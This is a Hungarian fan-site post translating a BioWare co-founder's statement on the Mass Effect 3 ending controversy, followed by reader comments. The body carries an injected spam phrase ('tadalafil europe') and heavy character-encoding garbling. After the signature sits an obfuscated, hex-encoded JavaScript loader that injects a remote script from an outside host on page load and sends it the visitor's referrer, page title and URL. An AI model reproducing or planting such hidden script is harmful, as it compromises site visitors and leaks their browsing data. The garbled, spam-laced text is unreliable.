Dr. Ray Muzyka, a Bioware tA?rsalapA�tA?jA?nak reakciA?ja [Bioware blog]

A mai napon Dr. Ray Muzyka, a Bioware stA?diA? tA?rsalapA�tA?ja, A�s az Electronic ArtsA�alelnA�ke reagA?lt a Mass Effect 3A�befejezA�sA�vel kapcsolatban tA?madt rajongA?i felhA?borodA?sra. Az alA?bbiakban a Bioware blogjA?n kA�zzA�tett bejegyzA�sA�nek a fordA�tA?sA?t olvashatjA?tok.

tadalafil europe. A Bioware tA?rsalapA�tA?jakA�nt A�s a BioWare vezA�rigazgatA?jakA�nt nagyon bA?szke vagyok az ME3 csapatA?ra; szemA�ly szerint hiszek abban, hogy a Mass Effect 3 a legjobb munkA?nk, amit idA?ig csinA?ltunk. A�ppen ezA�rt elkA�pesztA�en fA?jdalmas, hogy a rajongA?ktA?l olyan visszajelzA�seket kapunk, amik szerint a jA?tA�k befejezA�sei nem felelnek meg a vA?rakozA?saiknak. Az elsA�, A�sztA�nA�s reakciA?nk az, hogy megvA�djA?k a munkA?nkat A�s rA?mutassunk a kritikusok magas pontszA?maira – ugyanakkor a rajongA?ink irA?nt A�rzett tiszteletbA�l alA?zattal el kell fogadnunk a kritikA?kat A�s visszajelzA�seket.

SzenvedA�lyesen hiszek abban, hogy a jA?tA�k a mA�vA�szetek egyik formA?ja; mA�diumunknak az ereje pedig a kA�zA�nsA�gA?nkbA�l tA?plA?kozik, amely nagyon mA�lyen A�rintett abban, hogy a tA�rtA�net hogyan bontakozik ki. A�s ennek a kA�zA�nsA�gnek vitathatatlan joga az, hogy konstruktA�v kritikA?kat kA�zA�ljA�n. Ezzel egyA?tt azonban hiszek A�s tA?mogatom is a fejlesztA�csapat mA�vA�szeti dA�ntA�seit. A csapat A�s A�n is kemA�nyen gondolkodunk azon, hogyan reagA?ljunk a ME3-al kapcsolatos hozzA?szA?lA?sokra A?gy, hogy kA�zben megtartjuk a jA?tA�k mA�vA�szi integritA?sA?t is.

A Mass Effect 3 A?gy fejezi be a trilA?giA?t, hogy nagyon nagy befolyA?sa van a jA?tA�kosoknak a tA�rtA�net felett, ezA�rt nagyon nehA�z volt szA?munkra megjA?solni azt, milyen A�rzelmeket vA?lt ki a jA?tA�kosokbA?l, amikor befejezi azt. A Mass Effect vilA?gA?ban tett utazA?s nagyon intenzA�v, szemA�lyes A�rzA�seket vA?lt ki a jA?tA�kosokban; de ezzel egyA?tt is, az a szenvedA�lyes reakciA?, amit a leghA�sA�gesebb jA?tA�kosaink egy rA�szA�bA�l a Mass Effect 3 jelenlegi befejezA�sei kivA?ltottak, alapvetA�en megleptek minket. Ezzel az A?ggyel nagyon mA�lyen tA�rA�dA?nk, A�s idA�ben, fair mA?don fogunk rA? vA?laszolni. MA?r most is nagyon kemA�nyen dolgozunk rajta.

MiA?ta a jA?tA�k megjelent, a csapat minden reakciA?t megvizsgA?l, ami a jA?tA�kkal kapcsolatban megtalA?lhatA? – a szaksajtA?t, a fA?rumokat, Facebookot A�s Twittert, csak hogy pA?rat megemlA�tsek. A Mass Effect csapat, csakA?gy, mint minden mA?s csapat a Bioware cA�mke alatt az EA-nA�l, szenvedA�lyes emberekbA�l A?ll, akik kemA�nyen dolgoznak, hogy izgalmas A�s A�rA�mteli A�lmA�nyt szerezzenek rajongA?inknak. MegtiszteltetA�s velA?k dolgozni, mivel volt bA?torsA?guk A�s erejA?k, hogy az A�pA�tA� jellegA� visszajelzA�sekre vA?laszoljanak.

A kutatA?saikra alapozva Casey HudsonA�executive producer A�s a csapat kemA�nyen dolgozik tA�bb olyan jA?tA�ktartalom-kezdemA�nyen, amik segA�thetnek megvA?laszolni a kA�rdA�seket, mA�g nagyon tisztA?nlA?tA?st biztosA�tva azoknak, akik tovA?bbi lezA?rA?st vA?rnak az utazA?sukhoz. ErrA�l A?prilisban fogtok tA�bbet hallani. Nagyon kemA�nyen dolgozunk azon, hogy fenntarthassuk a megfelelA� egyensA?lyt a tA�rtA�netA?nk mA�vA�szi integritA?sA?n, ugyanakkor megfeleljA?nk a rajongA?i visszajelzA�seknek, amiket kaptunk. KiegA�szA�tve ezzel a mA?r meglA�vA� terveinket az A?j Mass Effect tartalmakra A�s A?j teljes jA?tA�kokra, A?gyhogy nyugodjatok meg, az utazA?s a Mass Effect univerzumA?ban tud A�s fog is folytatA?dni.

A Mass Effect 3 megjelenA�sA�re adott reakciA?k megjA?solhatatlanok voltak. EgyrA�szrA�l, hA�sA�ges rajongA?ink egy rA�sze szenvedA�lyesen hangot ad nemtetszA�sA�nek a jA?tA�k lezA?rA?sA?val kapcsolatban; tA�rA�dA?nk ezzel a visszajelzA�ssel A�s tervezzA?k, hogy egyenesen vA?laszolunk rA?juk. Ugyanakkor A?gy tA�nik, hogy a legtA�bben egyetA�rtenek azzal, hogy a jA?tA�k egA�szA�ben vA�ve kitA�nA�, 75 kritika tA�kA�letes pontszA?mot adott rA?, a kritikA?k A?tlaga 90 kA�rA?li. BA?szke vagyok a csapatra, de tudunk A�s muszA?j is mindig jobban igyekezni.

A bA�rA?latok egy rA�sze, amit a szenvedA�lyessA�g hevA�ben nA�hA?ny nagyon tA?zes rajongA?nk adott, sajnA?latos mA?don inkA?bb destruktA�v mint konstruktA�v volt, mA�g abban az esetben is, ha olyan alapos indokra A�pA?lt is, mint a kA�rdA�sek egy rA�szA�nek tisztA?zA?sa vagy a jobb lezA?rA?s. Meghallgatjuk A�s vA?laszolunk a konstruktA�v kritikA?kat, de nem tolerA?ljuk az egyA�ni tA?madA?sokat a csapatunk tagjai ellen A�s nem tA?mogatunk vagy vA?laszolunk destruktA�v kommentA?rokra.

Ha Mass Effect rajongA? vagy A�s megjegyzA�sed lenne a csapat szA?mA?ra – tiszteljA?k a vA�lemA�nyedet A�s hallani akarunk rA?la. ElkA�teleztA?k magunkat, hogy a legjobban megfelelA?nk a konstruktA�v visszajelzA�sekre. CserA�be azt kA�rem, hogy segA�tsetek nekA?nk azzal, hogy tA?mogatjA?tok azt a jA?tA�kot, ami hitem szerint a Bioware egyik legjobbja. Arra A�sztA�nA�zlek titeket, hogy csinA?ljA?tok meg a sajA?t kutatA?sotokat; jA?tszatok a jA?tA�kkal, fejezzA�tek be, A�s mondjA?tok el nekA?nk, mit gondoltok. MondjA?tok el a barA?taitoknak, ha A?gy A�rzitek, hogy egA�szA�ben vA�ve ez egy jA? jA?tA�k. BA�zzatokA�abban, hogy minden tA�lA?nk telhetA�t megteszA?nk megfeleljA?nk a visszajelzA�seitekre. Mint mA�vA�szek, nagyon mA�lyen tA�rA�dA?nk a rajongA?inkkal A�s kA�szA�njA?k a tA?mogatA?sotokat.

KA�szA�njA?k a visszajelzA�seket – mi meghallgatunk titeket.

Rayvar _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Szerző:

Merras

A Miyazaki Jun nem álnév, echte original japán importárú vagyok apai részről. Amikor épp nem valami sci-fi honlapot hegesztek, vagy rendezvényt csinálok, akkor kénytelen vagyok dolgozni, ennek kapcsán online marketing tanácsadóként tevékenykedem.

12 thoughts on “Dr. Ray Muzyka, a Bioware tA?rsalapA�tA?jA?nak reakciA?ja [Bioware blog]”

  1. Ez egy szimpla PR bullshit, és ráadásul rossz érzéseim vannak a végkimenetelt illetően.

    1., lejön, hogy tök jónak érzik a befejezést, és nem értik, mi a rajongók problémája
    2., jönnek a “művészi integritás”-dumával, amikor egész egyszerűen rossz a játék befejezése. Tanulhatnának a Bethesda-tól, akinek a vezetője képes volt elismerni, hogy elcseszték a Fallout 3 végét.
    3., próbálják kisebbíteni az elégedetlenkedők tömegét, és nagyobbítani az elégedettek táborát. Viszont minden felmérés és fórum az ellenkező arányt mutatja
    4. nekem úgy tűnik, hogy az újabb DLC-kből inkább magyarázatot, némi kiegészítést láthatunk majd a meglévő befejezésre, nem pedig egy új befejezést.
    5. nem tudom, mit ért destruktív kritika alatt; hacsak azt nem, hogy már látják az eladások csökkenését, de erről meg nem a rajongók tehetnek.

  2. Komolyan – már elnézést, hogy így fogalmazok – nem ér náluk agyat, hogy azzal van a fő problémánk, hogy semmi köze a történethez az utolsó 10-15 percnek?

    A Deception novellánál legalább elismerték, hogy hibáztak, és javítani fogják. Egyelőre az ME3 végét nagyon védik… de mintha erre a Dietz gyerekre bízták volna a befejezés megírását, annyira nincs semmi köze a Mass Effect trilógiához a befejezésnek.

      1. Hál’ istennek Dietz nem dolgozott az ME3-on, Karpyshyn pedig már az ME2 idején távozott a gárdából. Előbb az SWTOR-on dolgozott, év eleje óta meg szabadúszó.

        1. Kösz az infót. Annyit tudtam csak, hogy az SWTOR-on dolgozott.
          ME2-t mikor hagyta el? Illetve menyit dolgozott benne?
          Azért kérdezem, mert látom otthonosan mozogsz a témában.

          Különben gondolom nektek is feltűnt, de az ME3-ban a Rannoch küldetések után van egy hatalmas nagy törés. Addig a sztori is kidolgozottnak hat, egyfajta kerek egész, ami a kisebb-nagyobb hibái ellenére illik az eddigi történtekhez. Itt még a haldokló Reaper is körülbelül hasonló dolgokat mond mint Nazara és Harbinger.
          Az ezután való történéseken már kezdtem érezni, hogy valami megváltozott.
          Más is így volt vele?

          1. Nem annyira szembetűnő, de igen. Még a Thessia mission okés, bár már ott érződik, hogy valami nem stimt.

            Egyébként azon a pályán érződik a legjobban, hogy Javik mégiscsak egy utólag kivágott karakter, aki amúgy eredetileg is a sztori szerves része volt.

            Egy második végigjátszásban direkt azt csináltam, hogy Javikot vittem Liara mellé, és bizony nagyon sok kommentje van a templomban és sokat vitatkozik Javik Liarával. Plusz, akár Javikot vitted társnak, akár nem, a küldetés után kitör a balhé kettejük között a Normandyn, úgy kell lecsillapítani a kedélyeket. Ez a jelenet is arra utal, hogy a sztori szerves része volt Javik.

            Az eredeti tervek szerint állítólag egyébként – hasonlóan a Virmire-küldetéshez -, itt is elvesztetted volna az egyik kísérőt, értelemszerűen Liara és a másik csapattárs között kellett volna választani. Én örülök, hogy ezt kivágták belőle. A Virmire döntésnek volt alapja és értelme, míg Kai Leng szerintem a legpocsékabb boss a Mass Effect sorozatban, akit azért nem lehet szájbarúgni, mert csak. [Sarent sem lehetett szájbarúgni a Virmire-ön, mégis jól meg volt oldva a dolog; a harcot nagyon jól körítette a vele való beszélgetés.]

          2. Én csak akkor kezdtem konkrétan érezni, mikor már Londonban búcsúzkodni kezdtünk a társakkal, hogy már egy ideje nem jó irányba megyünk.

            Az is feltűnő volt, hogy a Cerberus főbázis előtt megkérdez a játék, hogy tutira biztosan indítod a küldit? Akkor már egyértelmű volt, hogy a végjátékba csaptunk és valami fog az Illusive Man-nél történni ami után egyenesen jöhetünk vissza a Földre.

            Habár hiányzott, örültem, hogy kimaradt, ha érzelmileg sokkolnak, hogy áldozz fel csapattagot vagy bizonyos mission-re ha nem jó társakat viszel akkor esetleg meghalnak vagy valami.
            Ha látom elhullani a társakat és/vagy látni az esélytelenséget, akkor még lett is volna értelme a piros/arany/narancssárga robbanást választani vagy akármelyiket mert akkor minden mindegy lett volna…

  3. Én pedig köszönöm ezt a tartalmas és korrekt közleményt Ray Muzyka-nak. Én is azok táborába tartozok, akiknek nagyon nem tetszett a befejezés és remélem, hogy kezdenek vele valamit. Igazat adok neki. A destruktív fröcsögéseket és köpködéseket nem szabad tolerálni, elvégre egy szuper trilógiát adtak nekünk.A kulturált észérvekkel kommentelőket pedig meg kell hallgatni, és nem szarni a fejükre. Most csak egyetlen negatív kritikát mondok a végével: Mi a szarért kellett Shepivel Istent játszatni?

  4. Nekem már az is eszembe jutott kínomban, hogy mi van ha ez az egész el volt tervezve?
    Szánt szándékkal készítették így a befejezést, mi reagáltunk, ők röhögtek a markukba, hogy pont ezt várták, nekünk azt kommunikálták, hogy nem értik, mi bajunk? Kicsit vártak, addig is duzzadt a dolog, mi tartottuk a vonalat, majd jöttek a PR bullshitekkel és nem konkrét mézesmadzaggal hogy lesznek DLC-k, és még nem is vetették el azt az ötletet sem, hogy változtassanak a végén avagy már eleve volt terv erre is (sok kivágott jelenet van még és/ vagy elfekvőben egy izmos DLC bevetésre készen), hogy majd pénzért vagy épp free (EA kapzsi SOB / jófejségi alapon), majd hozzánk lehessen vágni.
    Ha márpedig az egész akció jól eltervezett és ők irányítják a szálakat, akkor bezony indoktrinálva vagyunk úgy istenigazából, frankón.

  5. A gond ott van igazándiból hogy Muzyka úrnak vagy fingja sincs az elégedettek/elégedetlenek arányáról (kétlem) vagy egyszerűen egy hazug disznó…. tipikus politikus duma, nagy kalap összehordott semmi az egész.
    Gratulálok Ray, tökéletesen használod a relatív fogalmakat hogy kiforgasd a tényeket: “A rajongók “Egy részének” nem tetszett a játék vége”, hát igen, a 90-98% is “egy része” de inkább 5-6%nak hangzik.

    “A KRITIKUSOK ilyen meg olyan értékelést adtak?” Magasról teszek a kritikusok véleményére, a kritikusok nagyjából 0,001%át teszik ki a játékosoknak nem is beszélve arról hogy nagy részük:
    Vagy: Nem játszott az előző 2 résszel (Ergó nem kötődik a trilógiához lelkileg)
    Vagy: Munkaszerűen foglalkozik játékokkal, kritikákat ír (Ergó nem kötődik a trilógiához lelkileg)
    Vagy: Része bizonyos hiper-cégek által EGYÁLTALÁN nem befolyásolt “Független”(haha) magazinnak legyen az online vagy papírforma (Ergó azt írja amit kell, nem amit akar)

    Szerintem nem a kritikusok alapján kéne megítélni milyen a játék, a kritikusok (általában) adnak egy nagyjáboli véleményt milyen a játék szigorúan technikai szempontból, de ha a vége szar hiába jó a játék technikailag, mert emberek vagyunk és nem úgy működünk hogy “Számítás… a ME3 40 órájából csak 15 percet nem szerettem ezért jó játék.”

    Igen… zseniális játék lenne, valószínűleg a valaha volt legjobb sci-fi dráma trilógia ha a végének köze lenne a játékhoz 😀

Hozzászólások lehetősége itt nem engedélyezett.